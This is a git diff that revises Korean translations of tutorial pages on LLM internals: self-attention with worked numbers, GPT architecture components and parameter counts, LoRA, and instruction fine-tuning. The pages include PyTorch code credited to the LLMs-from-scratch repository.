+> 이 네 번째 단계의 목표는 매우 간단합니다: **일부 주의 메커니즘을 적용하세요**. 이는 **어휘의 단어와 현재 LLM 훈련에 사용되는 문장에서의 이웃 간의 관계를 포착하는 많은 **반복 레이어**가 될 것입니다.**\
 > 이를 위해 많은 레이어가 사용되므로 많은 학습 가능한 매개변수가 이 정보를 포착하게 됩니다.
 
-### Understanding Attention Mechanisms
+### 주의 메커니즘 이해하기
 
-In traditional sequence-to-sequence models used for language translation, the model encodes an input sequence into a fixed-size context vector. However, this approach struggles with long sentences because the fixed-size context vector may not capture all necessary information. Attention mechanisms address this limitation by allowing the model to consider all input tokens when generating each output token.
+언어 번역에 사용되는 전통적인 시퀀스-투-시퀀스 모델에서 모델은 입력 시퀀스를 고정 크기 컨텍스트 벡터로 인코딩합니다. 그러나 이 접근 방식은 고정 크기 컨텍스트 벡터가 필요한 모든 정보를 포착하지 못할 수 있기 때문에 긴 문장에서 어려움을 겪습니다. 주의 메커니즘은 모델이 각 출력 토큰을 생성할 때 모든 입력 토큰을 고려할 수 있도록 하여 이 한계를 해결합니다.
 
-#### Example: Machine Translation
+#### 예시: 기계 번역
 
-Consider translating the German sentence "Kannst du mir helfen diesen Satz zu übersetzen" into English. A word-by-word translation would not produce a grammatically correct English sentence due to differences in grammatical structures between languages. An attention mechanism enables the model to focus on relevant parts of the input sentence when generating each word of the output sentence, leading to a more accurate and coherent translation.
+독일어 문장 "Kannst du mir helfen diesen Satz zu übersetzen"을 영어로 번역한다고 가정해 보겠습니다. 단어별 번역은 언어 간의 문법 구조 차이로 인해 문법적으로 올바른 영어 문장을 생성하지 못할 것입니다. 주의 메커니즘은 모델이 출력 문장의 각 단어를 생성할 때 입력 문장의 관련 부분에 집중할 수 있도록 하여 보다 정확하고 일관된 번역을 이끌어냅니다.
 
-### Introduction to Self-Attention
+### 자기 주의 소개
 
-Self-attention, or intra-attention, is a mechanism where attention is applied within a single sequence to compute a representation of that sequence. It allows each token in the sequence to attend to all other tokens, helping the model capture dependencies between tokens regardless of their distance in the sequence.
+자기 주의, 또는 내부 주의는 주의가 단일 시퀀스 내에서 적용되어 해당 시퀀스의 표현을 계산하는 메커니즘입니다. 이는 시퀀스의 각 토큰이 다른 모든 토큰에 주의를 기울일 수 있게 하여 모델이 시퀀스 내에서 토큰 간의 의존성을 포착하는 데 도움을 줍니다.
 
-#### Key Concepts
+#### 주요 개념
 
-- **Tokens**: 입력 시퀀스의 개별 요소(예: 문장의 단어).
-- **Embeddings**: 의미 정보를 포착하는 토큰의 벡터 표현.
-- **Attention Weights**: 다른 토큰에 대한 각 토큰의 중요성을 결정하는 값.
+- **토큰**: 입력 시퀀스의 개별 요소(예: 문장의 단어).
+- **임베딩**: 의미 정보를 포착하는 토큰의 벡터 표현.
+- **주의 가중치**: 각 토큰의 중요성을 다른 토큰에 비해 결정하는 값.
 
-### Calculating Attention Weights: A Step-by-Step Example
+### 주의 가중치 계산: 단계별 예시
 
-Let's consider the sentence **"Hello shiny sun!"** and represent each word with a 3-dimensional embedding:
+문장 **"Hello shiny sun!"**을 고려하고 각 단어를 3차원 임베딩으로 표현해 보겠습니다:
 
 - **Hello**: `[0.34, 0.22, 0.54]`
 - **shiny**: `[0.53, 0.34, 0.98]`
 - **sun**: `[0.29, 0.54, 0.93]`
 
-Our goal is to compute the **context vector** for the word **"shiny"** using self-attention.
+우리의 목표는 자기 주의를 사용하여 **"shiny"**라는 단어의 **컨텍스트 벡터**를 계산하는 것입니다.
 
-#### Step 1: Compute Attention Scores
+#### 단계 1: 주의 점수 계산
 
 > [!TIP]
-> 각 차원 값을 쿼리의 관련 값과 곱하고 결과를 더하세요. 각 토큰 쌍에 대해 1개의 값을 얻습니다.
+> 각 차원 값의 쿼리를 관련된 각 토큰의 값과 곱하고 결과를 더하세요. 각 토큰 쌍에 대해 1개의 값을 얻습니다.
 
-For each word in the sentence, compute the **attention score** with respect to "shiny" by calculating the dot product of their embeddings.
+문장의 각 단어에 대해 "shiny"에 대한 **주의 점수**를 계산하기 위해 그들의 임베딩의 내적을 계산합니다.
 
-**Attention Score between "Hello" and "shiny"**
+**"Hello"와 "shiny" 간의 주의 점수**
 
 <figure><img src="../../images/image (4) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 
-**Attention Score between "shiny" and "shiny"**
+**"shiny"와 "shiny" 간의 주의 점수**
 
 <figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 
-**Attention Score between "sun" and "shiny"**
+**"sun"과 "shiny" 간의 주의 점수**
 
 <figure><img src="../../images/image (2) (1) (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 
-#### Step 2: Normalize Attention Scores to Obtain Attention Weights
+#### 단계 2: 주의 점수를 정규화하여 주의 가중치 얻기
 
 > [!TIP]
-> 수학적 용어에 혼란스러워하지 마세요. 이 함수의 목표는 간단합니다. 모든 가중치를 정규화하여 **총합이 1이 되도록** 합니다.\
+> 수학적 용어에 휘말리지 마세요. 이 함수의 목표는 간단합니다. 모든 가중치를 정규화하여 **총합이 1이 되도록** 하는 것입니다.
+>
 > 또한, **softmax** 함수는 지수 부분으로 인해 차이를 강조하므로 유용한 값을 감지하기 쉽게 만듭니다.
 
-Apply the **softmax function** to the attention scores to convert them into attention weights that sum to 1.
+주의 점수에 **softmax 함수**를 적용하여 총합이 1이 되는 주의 가중치로 변환합니다.
 
 <figure><img src="../../images/image (3) (1) (1) (1) (1).png" alt="" width="293"><figcaption></figcaption></figure>
 
-Calculating the exponentials:
+지수 계산:
 
 <figure><img src="../../images/image (4) (1) (1) (1).png" alt="" width="249"><figcaption></figcaption></figure>
 
-Calculating the sum:
+합계 계산:
 
 <figure><img src="../../images/image (5) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 
-Calculating attention weights:
+주의 가중치 계산:
 
 <figure><img src="../../images/image (6) (1) (1).png" alt="" width="404"><figcaption></figcaption></figure>
 
-#### Step 3: Compute the Context Vector
+#### 단계 3: 컨텍스트 벡터 계산
 
 > [!TIP]
 > 각 주의 가중치를 가져와 관련된 토큰 차원에 곱한 다음 모든 차원을 더하여 단 하나의 벡터(컨텍스트 벡터)를 얻으세요.&#x20;
 
-The **context vector** is computed as the weighted sum of the embeddings of all words, using the attention weights.
+**컨텍스트 벡터**는 모든 단어의 임베딩의 가중 합으로 계산되며, 주의 가중치를 사용합니다.
 
 <figure><img src="../../images/image (16).png" alt="" width="369"><figcaption></figcaption></figure>
 
-Calculating each component:
+각 구성 요소 계산:
 
-- **Weighted Embedding of "Hello"**:
+- **"Hello"의 가중 임베딩**:
 
 <figure><img src="../../images/image (7) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-- **Weighted Embedding of "shiny"**:
+- **"shiny"의 가중 임베딩**:
 
 <figure><img src="../../images/image (8) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-- **Weighted Embedding of "sun"**:
+- **"sun"의 가중 임베딩**:
 
 <figure><img src="../../images/image (9) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-Summing the weighted embeddings:
+가중 임베딩 합산:
 
 `context vector=[0.0779+0.2156+0.1057, 0.0504+0.1382+0.1972, 0.1237+0.3983+0.3390]=[0.3992,0.3858,0.8610]`
 
-**This context vector represents the enriched embedding for the word "shiny," incorporating information from all words in the sentence.**
+**이 컨텍스트 벡터는 "shiny"라는 단어에 대한 풍부한 임베딩을 나타내며, 문장의 모든 단어로부터 정보를 통합합니다.**
 
-### Summary of the Process
+### 과정 요약
 
-1. **Compute Attention Scores**: Use the dot product between the embedding of the target word and the embeddings of all words in the sequence.
-2. **Normalize Scores to Get Attention Weights**: Apply the softmax function to the attention scores to obtain weights that sum to 1.
-3. **Compute Context Vector**: Multiply each word's embedding by its attention weight and sum the results.
+1. **주의 점수 계산**: 대상 단어의 임베딩과 시퀀스의 모든 단어의 임베딩 간의 내적을 사용합니다.
+2. **점수를 정규화하여 주의 가중치 얻기**: 주의 점수에 softmax 함수를 적용하여 총합이 1이 되는 가중치를 얻습니다.
+3. **컨텍스트 벡터 계산**: 각 단어의 임베딩에 주의 가중치를 곱하고 결과를 합산합니다.
 
-## Self-Attention with Trainable Weights
+## 학습 가능한 가중치를 가진 자기 주의
 
-In practice, self-attention mechanisms use **trainable weights** to learn the best representations for queries, keys, and values. This involves introducing three weight matrices:
+실제로 자기 주의 메커니즘은 **학습 가능한 가중치**를 사용하여 쿼리, 키 및 값에 대한 최상의 표현을 학습합니다. 이는 세 개의 가중치 행렬을 도입하는 것을 포함합니다:
 
 <figure><img src="../../images/image (10) (1) (1).png" alt="" width="239"><figcaption></figcaption></figure>
 
-The query is the data to use like before, while the keys and values matrices are just random-trainable matrices.
+쿼리는 이전과 같이 사용할 데이터이며, 키와 값 행렬은 단순히 무작위 학습 가능한 행렬입니다.
 
-#### Step 1: Compute Queries, Keys, and Values
+#### 단계 1: 쿼리, 키 및 값 계산
 
-Each token will have its own query, key and value matrix by multiplying its dimension values by the defined matrices:
+각 토큰은 정의된 행렬에 의해 자신의 쿼리, 키 및 값 행렬을 가지게 됩니다:
 
 <figure><img src="../../images/image (11).png" alt="" width="253"><figcaption></figcaption></figure>
 
-These matrices transform the original embeddings into a new space suitable for computing attention.
+이 행렬들은 원래 임베딩을 주의를 계산하기에 적합한 새로운 공간으로 변환합니다.
 
-**Example**
+**예시**
 
-Assuming:
+가정:
 
-- Input dimension `din=3` (embedding size)
-- Output dimension `dout=2` (desired dimension for queries, keys, and values)
+- 입력 차원 `din=3` (임베딩 크기)
+- 출력 차원 `dout=2` (쿼리, 키 및 값에 대한 원하는 차원)
 
-Initialize the weight matrices:
+가중치 행렬 초기화:
 ```python
 import torch.nn as nn
 
@@ -156,20 +157,20 @@ values = torch.matmul(inputs, W_value)
 
 **Compute Attention Scores**
 
-이전 예제와 유사하지만, 이번에는 토큰의 차원 값 대신 토큰의 키 행렬을 사용합니다(이미 차원을 사용하여 계산됨):. 따라서 각 쿼리 `qi`​와 키 `kj​`에 대해:
+이전 예제와 유사하지만, 이번에는 토큰의 차원 값을 사용하는 대신, 이미 차원을 사용하여 계산된 토큰의 키 행렬을 사용합니다. 따라서 각 쿼리 `qi`​와 키 `kj​`에 대해:
 
 <figure><img src="../../images/image (12).png" alt=""><figcaption></figcaption></figure>
 
 **Scale the Scores**
 
-내적이 너무 커지는 것을 방지하기 위해, 키 차원 `dk`​의 제곱근으로 점수를 조정합니다:
+내적이 너무 커지는 것을 방지하기 위해, 키 차원 `dk`​의 제곱근으로 점수를 스케일링합니다:
 
 <figure><img src="../../images/image (13).png" alt="" width="295"><figcaption></figcaption></figure>
 
 > [!TIP]
 > 점수는 차원의 제곱근으로 나누어지는데, 이는 내적이 매우 커질 수 있기 때문에 이를 조절하는 데 도움이 됩니다.
 
-**Apply Softmax to Obtain Attention Weights:** 초기 예제와 같이 모든 값을 정규화하여 합이 1이 되도록 합니다.&#x20;
+**Apply Softmax to Obtain Attention Weights:** 초기 예제와 같이, 모든 값을 정규화하여 합이 1이 되도록 합니다.&#x20;
 
 <figure><img src="../../images/image (14).png" alt="" width="295"><figcaption></figcaption></figure>
 
@@ -258,7 +259,7 @@ attention_weights = dropout(attention_weights)
 
 ### 코드 예제
 
-코드 예제는 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb)에서 확인할 수 있습니다:
+[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb)에서의 코드 예제:
 ```python
 import torch
 import torch.nn as nn
@@ -326,7 +327,7 @@ print("context_vecs.shape:", context_vecs.shape)
 
 ### 코드 예제
 
-이전 코드를 재사용하고 여러 번 실행하는 래퍼를 추가하는 것이 가능할 수 있지만, 이는 모든 헤드를 동시에 처리하는 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb)에서 더 최적화된 버전입니다(비용이 많이 드는 for 루프의 수를 줄임). 코드에서 볼 수 있듯이 각 토큰의 차원은 헤드 수에 따라 서로 다른 차원으로 나뉩니다. 이렇게 하면 토큰이 8차원을 가지고 있고 3개의 헤드를 사용하고자 할 경우, 차원은 4차원의 2개의 배열로 나뉘고 각 헤드는 그 중 하나를 사용합니다:
+이전 코드를 재사용하고 여러 번 실행하는 래퍼를 추가하는 것이 가능할 수 있지만, 이는 모든 헤드를 동시에 처리하는 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch03/01_main-chapter-code/ch03.ipynb)에서 더 최적화된 버전입니다 (비용이 많이 드는 for 루프의 수를 줄임). 코드에서 볼 수 있듯이 각 토큰의 차원은 헤드 수에 따라 서로 다른 차원으로 나뉩니다. 이렇게 하면 토큰이 8차원을 가지고 있고 3개의 헤드를 사용하고자 할 경우, 차원은 4차원 배열 2개로 나뉘고 각 헤드는 그 중 하나를 사용하게 됩니다:
 ```python
 class MultiHeadAttention(nn.Module):
 def __init__(self, d_in, d_out, context_length, dropout, num_heads, qkv_bias=False):
diff --git a/src/todo/llm-training-data-preparation/5.-llm-architecture.md b/src/todo/llm-training-data-preparation/5.-llm-architecture.md
index 5f7266373..ba4547a23 100644
--- a/src/todo/llm-training-data-preparation/5.-llm-architecture.md
+++ b/src/todo/llm-training-data-preparation/5.-llm-architecture.md
@@ -211,13 +211,13 @@ torch.sqrt(torch.tensor(2.0 / torch.pi)) *
 #### **목적 및 기능**
 
 - **GELU (가우시안 오류 선형 단위):** 모델에 비선형성을 도입하는 활성화 함수입니다.
-- **부드러운 활성화:** 음수 입력을 0으로 만드는 ReLU와 달리, GELU는 음수 입력에 대해 작고 0이 아닌 값을 허용하며 입력을 출력으로 부드럽게 매핑합니다.
+- **부드러운 활성화:** 음수 입력을 0으로 만드는 ReLU와 달리, GELU는 입력을 출력으로 부드럽게 매핑하여 음수 입력에 대해 작은 비영 값도 허용합니다.
 - **수학적 정의:**
 
 <figure><img src="../../images/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 > [!NOTE]
-> FeedForward 레이어 내의 선형 레이어 후 이 함수를 사용하는 목적은 선형 데이터를 비선형으로 변경하여 모델이 복잡하고 비선형적인 관계를 학습할 수 있도록 하는 것입니다.
+> FeedForward 레이어 내의 선형 레이어 뒤에서 이 함수를 사용하는 목적은 선형 데이터를 비선형으로 변경하여 모델이 복잡하고 비선형적인 관계를 학습할 수 있도록 하는 것입니다.
 
 ### **FeedForward 신경망**
 
@@ -293,16 +293,16 @@ return self.scale * norm_x + self.shift
 
 - **레이어 정규화:** 배치의 각 개별 예제에 대해 특성(임베딩 차원) 전반에 걸쳐 입력을 정규화하는 데 사용되는 기술입니다.
 - **구성 요소:**
-- **`eps`:** 정규화 중 0으로 나누는 것을 방지하기 위해 분산에 추가되는 작은 상수(`1e-5`)입니다.
-- **`scale` 및 `shift`:** 정규화된 출력을 스케일하고 이동할 수 있도록 모델이 학습할 수 있는 매개변수(`nn.Parameter`)입니다. 각각 1과 0으로 초기화됩니다.
+- **`eps`:** 정규화 중 0으로 나누는 것을 방지하기 위해 분산에 추가되는 작은 상수(`1e-5`).
+- **`scale` 및 `shift`:** 모델이 정규화된 출력을 스케일하고 이동할 수 있도록 하는 학습 가능한 매개변수(`nn.Parameter`). 각각 1과 0으로 초기화됩니다.
 - **정규화 과정:**
 - **평균 계산(`mean`):** 임베딩 차원(`dim=-1`)에 걸쳐 입력 `x`의 평균을 계산하며, 브로드캐스팅을 위해 차원을 유지합니다(`keepdim=True`).
-- **분산 계산(`var`):** 임베딩 차원에 걸쳐 `x`의 분산을 계산하며, 차원도 유지합니다. `unbiased=False` 매개변수는 분산이 편향 추정기를 사용하여 계산되도록 보장합니다(N으로 나누기 대신 N-1로 나누기), 이는 샘플이 아닌 특성에 대해 정규화할 때 적합합니다.
+- **분산 계산(`var`):** 임베딩 차원에 걸쳐 `x`의 분산을 계산하며, 차원을 유지합니다. `unbiased=False` 매개변수는 분산이 편향 추정기를 사용하여 계산되도록 보장합니다(N으로 나누기 대신 N-1로 나누기), 이는 샘플이 아닌 특성에 대해 정규화할 때 적합합니다.
 - **정규화(`norm_x`):** `x`에서 평균을 빼고 분산에 `eps`를 더한 값의 제곱근으로 나눕니다.
 - **스케일 및 이동:** 정규화된 출력에 학습 가능한 `scale` 및 `shift` 매개변수를 적용합니다.
 
 > [!NOTE]
-> 목표는 동일한 토큰의 모든 차원에서 평균이 0이고 분산이 1이 되도록 하는 것입니다. 이는 **딥 뉴럴 네트워크의 훈련을 안정화**하기 위해 내부 공변량 이동을 줄이는 것을 목표로 하며, 이는 훈련 중 매개변수 업데이트로 인해 네트워크 활성화의 분포가 변화하는 것을 의미합니다.
+> 목표는 동일한 토큰의 모든 차원에서 평균이 0이고 분산이 1이 되도록 하는 것입니다. 이는 **딥 뉴럴 네트워크의 훈련을 안정화**하기 위해 내부 공변량 이동을 줄이는 것을 목표로 하며, 이는 훈련 중 매개변수 업데이트로 인해 네트워크 활성화의 분포 변화와 관련이 있습니다.
 
 ### **트랜스포머 블록**
 
@@ -370,13 +370,13 @@ return x  # Output shape: (batch_size, seq_len, emb_dim)
 
 > [!NOTE]
 > 변환기 블록은 모든 네트워크를 함께 그룹화하고 훈련 안정성과 결과를 개선하기 위해 일부 **정규화** 및 **드롭아웃**을 적용합니다.\
-> 각 네트워크 사용 후 드롭아웃이 수행되고 정규화가 이전에 적용되는 방식을 주목하세요.
+> 각 네트워크 사용 후 드롭아웃이 수행되고 정규화가 적용되는 방식을 주목하세요.
 >
 > 또한, **네트워크의 출력을 입력에 추가하는** 단축키를 사용합니다. 이는 초기 레이어가 마지막 레이어만큼 기여하도록 하여 소실 그래디언트 문제를 방지하는 데 도움이 됩니다.
 
 ### **GPTModel**
 
-_행렬의 형태를 더 잘 이해하기 위해 주석으로 추가되었습니다:_
+_행렬의 형태를 더 잘 이해하기 위해 주석으로 형태가 추가되었습니다:_
 ```python
 # From https://github.com/rasbt/LLMs-from-scratch/tree/main/ch04
 class GPTModel(nn.Module):
@@ -492,7 +492,7 @@ embedding_params = 38,597,376 + 786,432 = 39,383,808
 
 **트랜스포머 블록당 매개변수**
 
-**a. 멀티 헤드 어텐션**
+**a. 다중 헤드 주의 (Multi-Head Attention)**
 
 - **구성 요소:**
 - **쿼리 선형 레이어 (`W_query`):** `nn.Linear(emb_dim, emb_dim, bias=False)`
@@ -507,7 +507,7 @@ embedding_params = 38,597,376 + 786,432 = 39,383,808
 qkv_params = emb_dim * emb_dim = 768 * 768 = 589,824
 ```
 
-이러한 레이어가 3개 있으므로:
+이러한 레이어가 세 개 있으므로:
 
 ```python
 total_qkv_params = 3 * qkv_params = 3 * 589,824 = 1,769,472
@@ -519,14 +519,14 @@ total_qkv_params = 3 * qkv_params = 3 * 589,824 = 1,769,472
 out_proj_params = (emb_dim * emb_dim) + emb_dim = (768 * 768) + 768 = 589,824 + 768 = 590,592
 ```
 
-- **총 멀티 헤드 어텐션 매개변수:**
+- **총 다중 헤드 주의 매개변수:**
 
 ```python
 mha_params = total_qkv_params + out_proj_params
 mha_params = 1,769,472 + 590,592 = 2,360,064
 ```
 
-**b. 피드포워드 네트워크**
+**b. 피드포워드 네트워크 (FeedForward Network)**
 
 - **구성 요소:**
 - **첫 번째 선형 레이어:** `nn.Linear(emb_dim, 4 * emb_dim)`
@@ -554,7 +554,7 @@ ff_params = ff_first_layer_params + ff_second_layer_params
 ff_params = 2,362,368 + 2,360,064 = 4,722,432
 ```
 
-**c. 레이어 정규화**
+**c. 레이어 정규화 (Layer Normalizations)**
 
 - **구성 요소:**
 - 블록당 두 개의 `LayerNorm` 인스턴스.
@@ -608,7 +608,7 @@ total_params = 163,009,536
 ```
 ## 텍스트 생성
 
-이전과 같은 다음 토큰을 예측하는 모델이 있으면, 출력에서 마지막 토큰 값을 가져오기만 하면 됩니다(예측된 토큰의 값이 될 것이므로). 이는 **어휘의 각 항목에 대한 값**이 될 것이며, 그런 다음 `softmax` 함수를 사용하여 차원을 확률로 정규화하여 합이 1이 되도록 하고, 가장 큰 항목의 인덱스를 가져옵니다. 이 인덱스는 어휘 내의 단어의 인덱스가 됩니다.
+다음 토큰을 예측하는 모델이 있으면, 출력에서 마지막 토큰 값을 가져오기만 하면 됩니다(예측된 토큰의 값이 될 것이므로). 이는 **어휘의 각 항목에 대한 값**이 될 것이며, 그런 다음 `softmax` 함수를 사용하여 차원을 확률로 정규화하여 합이 1이 되도록 하고, 가장 큰 항목의 인덱스를 가져옵니다. 이 인덱스는 어휘 내의 단어의 인덱스가 됩니다.
 
 코드 출처 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch04/01_main-chapter-code/ch04.ipynb):
 ```python
diff --git a/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md b/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md
index 2b3951639..4c3302dee 100644
--- a/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md
+++ b/src/todo/llm-training-data-preparation/7.0.-lora-improvements-in-fine-tuning.md
@@ -17,7 +17,7 @@ LoRA는 모델의 **작은 부분**만 변경하여 **대형 모델**을 효율
 3. **효율적인 작업별 미세 조정**: 모델을 **새로운 작업**에 적응시키고 싶을 때, 나머지 모델은 그대로 두고 **작은 LoRA 행렬**(A와 B)만 훈련하면 됩니다. 이는 전체 모델을 재훈련하는 것보다 **훨씬 더 효율적**입니다.
 4. **저장 효율성**: 미세 조정 후, 각 작업에 대해 **전체 새로운 모델**을 저장하는 대신, 전체 모델에 비해 매우 작은 **LoRA 행렬**만 저장하면 됩니다. 이는 너무 많은 저장 공간을 사용하지 않고 모델을 여러 작업에 쉽게 적응시킬 수 있게 합니다.
 
-미세 조정 중 Linear 대신 LoraLayers를 구현하기 위해, 여기에서 제안된 코드는 [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb)입니다:
+미세 조정 중 Linear 대신 LoraLayers를 구현하기 위해 여기에서 이 코드가 제안됩니다 [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb):
 ```python
 import math
 
diff --git a/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md b/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md
index 9807d9d9d..acb2d000e 100644
--- a/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md
+++ b/src/todo/llm-training-data-preparation/7.2.-fine-tuning-to-follow-instructions.md
@@ -1,11 +1,11 @@
 # 7.2. 지침을 따르기 위한 미세 조정
 
 > [!TIP]
-> 이 섹션의 목표는 **텍스트 생성만 하는 것이 아니라 지침을 따르도록 이미 사전 훈련된 모델을 미세 조정하는 방법**을 보여주는 것입니다. 예를 들어, 챗봇으로서 작업에 응답하는 것입니다.
+> 이 섹션의 목표는 **텍스트를 생성하는 것뿐만 아니라 지침을 따르도록 이미 사전 훈련된 모델을 미세 조정하는 방법**을 보여주는 것입니다. 예를 들어, 챗봇으로서 작업에 응답하는 것입니다.
 
 ## 데이터셋
 
-LLM을 지침을 따르도록 미세 조정하기 위해서는 지침과 응답이 포함된 데이터셋이 필요합니다. LLM을 지침을 따르도록 훈련하는 데는 다양한 형식이 있습니다. 예를 들어:
+LLM을 지침을 따르도록 미세 조정하기 위해서는 LLM을 미세 조정할 지침과 응답이 포함된 데이터셋이 필요합니다. LLM을 지침을 따르도록 훈련하는 데는 다양한 형식이 있습니다. 예를 들어:
 
 - Apply Alpaca 프롬프트 스타일 예제:
 ```csharp
@@ -27,9 +27,9 @@ Can you explain what gravity is in simple terms?
 <|Assistant|>
 Absolutely! Gravity is a force that pulls objects toward each other.
 ```
-이러한 종류의 데이터 세트로 LLM을 훈련시키는 것은 단순한 원시 텍스트 대신 LLM이 수신하는 질문에 대해 구체적인 응답을 제공해야 함을 이해하는 데 도움이 됩니다.
+이러한 종류의 데이터 세트로 LLM을 훈련시키는 것은 단순한 원시 텍스트 대신 LLM이 받는 질문에 대해 구체적인 응답을 제공해야 한다는 것을 이해하는 데 도움이 됩니다.
 
-따라서 요청과 응답이 포함된 데이터 세트로 수행해야 할 첫 번째 작업 중 하나는 해당 데이터를 원하는 프롬프트 형식으로 모델링하는 것입니다. 예:
+따라서 요청과 응답이 포함된 데이터 세트로 수행해야 할 첫 번째 작업 중 하나는 원하는 프롬프트 형식으로 해당 데이터를 모델링하는 것입니다. 예:
 ```python
 # Code from https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/ch07.ipynb
 def format_input(entry):
@@ -58,36 +58,36 @@ print(model_input + desired_response)
 - 텍스트를 토큰화합니다.
 - 모든 샘플을 동일한 길이로 패딩합니다(일반적으로 길이는 LLM을 사전 훈련하는 데 사용된 컨텍스트 길이만큼 큽니다).
 - 사용자 정의 콜레이트 함수에서 입력을 1만큼 이동시켜 예상 토큰을 생성합니다.
-- 훈련 손실에서 제외하기 위해 일부 패딩 토큰을 -100으로 교체합니다: 첫 번째 `endoftext` 토큰 이후, 모든 다른 `endoftext` 토큰을 -100으로 대체합니다(왜냐하면 `cross_entropy(...,ignore_index=-100)`를 사용하면 -100인 타겟을 무시하기 때문입니다).
-- \[선택 사항\] LLM이 답변을 생성하는 방법만 배우도록 질문에 속하는 모든 토큰을 -100으로 마스킹합니다. Apply Alpaca 스타일에서는 `### Response:`까지 모든 것을 마스킹하는 것을 의미합니다.
+- 훈련 손실에서 제외하기 위해 일부 패딩 토큰을 -100으로 교체합니다: 첫 번째 `endoftext` 토큰 이후에 모든 다른 `endoftext` 토큰을 -100으로 대체합니다(왜냐하면 `cross_entropy(...,ignore_index=-100)`를 사용하면 -100인 타겟을 무시하기 때문입니다).
+- \[선택 사항\] LLM이 답변을 생성하는 방법만 배우도록 질문에 해당하는 모든 토큰을 -100으로 마스킹합니다. Apply Alpaca 스타일에서는 `### Response:`까지 모든 것을 마스킹하는 것을 의미합니다.
 
-이렇게 생성한 후, 각 데이터셋(훈련, 검증 및 테스트)을 위한 데이터 로더를 생성할 시간입니다.
+이렇게 생성한 후, 각 데이터셋(훈련, 검증 및 테스트)에 대한 데이터 로더를 생성할 시간입니다.
 
 ## 사전 훈련된 LLM 로드 및 미세 조정 및 손실 확인
 
-미세 조정을 위해 사전 훈련된 LLM을 로드해야 합니다. 이는 다른 페이지에서 이미 논의되었습니다. 그런 다음, 이전에 사용된 훈련 함수를 사용하여 LLM을 미세 조정할 수 있습니다.
+사전 훈련된 LLM을 로드하여 미세 조정해야 합니다. 이는 다른 페이지에서 이미 논의되었습니다. 그런 다음, 이전에 사용된 훈련 함수를 사용하여 LLM을 미세 조정할 수 있습니다.
 
-훈련 중에는 에포크 동안 훈련 손실과 검증 손실이 어떻게 변하는지 확인하여 손실이 줄어들고 있는지, 과적합이 발생하고 있는지를 확인할 수 있습니다.\
+훈련 중에는 훈련 손실과 검증 손실이 에포크 동안 어떻게 변하는지 확인할 수 있어 손실이 줄어들고 있는지, 과적합이 발생하고 있는지 확인할 수 있습니다.\
 과적합은 훈련 손실이 줄어들고 있지만 검증 손실이 줄어들지 않거나 심지어 증가할 때 발생합니다. 이를 피하기 위해 가장 간단한 방법은 이러한 행동이 시작되는 에포크에서 훈련을 중단하는 것입니다.
 
 ## 응답 품질
 
-이것은 손실 변화를 더 신뢰할 수 있는 분류 미세 조정이 아니므로, 테스트 세트에서 응답의 품질을 확인하는 것도 중요합니다. 따라서 모든 테스트 세트에서 생성된 응답을 수집하고 **그 품질을 수동으로 확인**하여 잘못된 답변이 있는지 확인하는 것이 좋습니다(LLM이 응답 문장의 형식과 구문을 올바르게 생성할 수 있지만 완전히 잘못된 응답을 제공할 수 있다는 점에 유의하십시오. 손실 변동은 이러한 행동을 반영하지 않습니다).\
-생성된 응답과 예상 응답을 **다른 LLM에 전달하여 응답을 평가하도록 요청**하여 이 검토를 수행할 수도 있습니다.
+이것은 손실 변화를 더 신뢰할 수 있는 분류 미세 조정이 아니므로, 테스트 세트에서 응답의 품질을 확인하는 것도 중요합니다. 따라서 모든 테스트 세트에서 생성된 응답을 수집하고 **그 품질을 수동으로 확인하는** 것이 좋습니다. 잘못된 답변이 있는지 확인합니다(LLM이 응답 문장의 형식과 구문을 올바르게 생성할 수 있지만 완전히 잘못된 응답을 제공할 수 있다는 점에 유의하십시오. 손실 변동은 이러한 행동을 반영하지 않습니다).\
+생성된 응답과 예상 응답을 **다른 LLM에 전달하여 응답을 평가하도록 요청하는** 방식으로 이 검토를 수행할 수도 있습니다.
 
 응답 품질을 검증하기 위해 실행할 다른 테스트:
 
-1. **대규모 다중 작업 언어 이해 (**[**MMLU**](https://arxiv.org/abs/2009.03300)**):** MMLU는 인문학, 과학 등 57개 주제에 걸쳐 모델의 지식과 문제 해결 능력을 평가합니다. 다양한 난이도에서 이해도를 평가하기 위해 객관식 질문을 사용합니다.
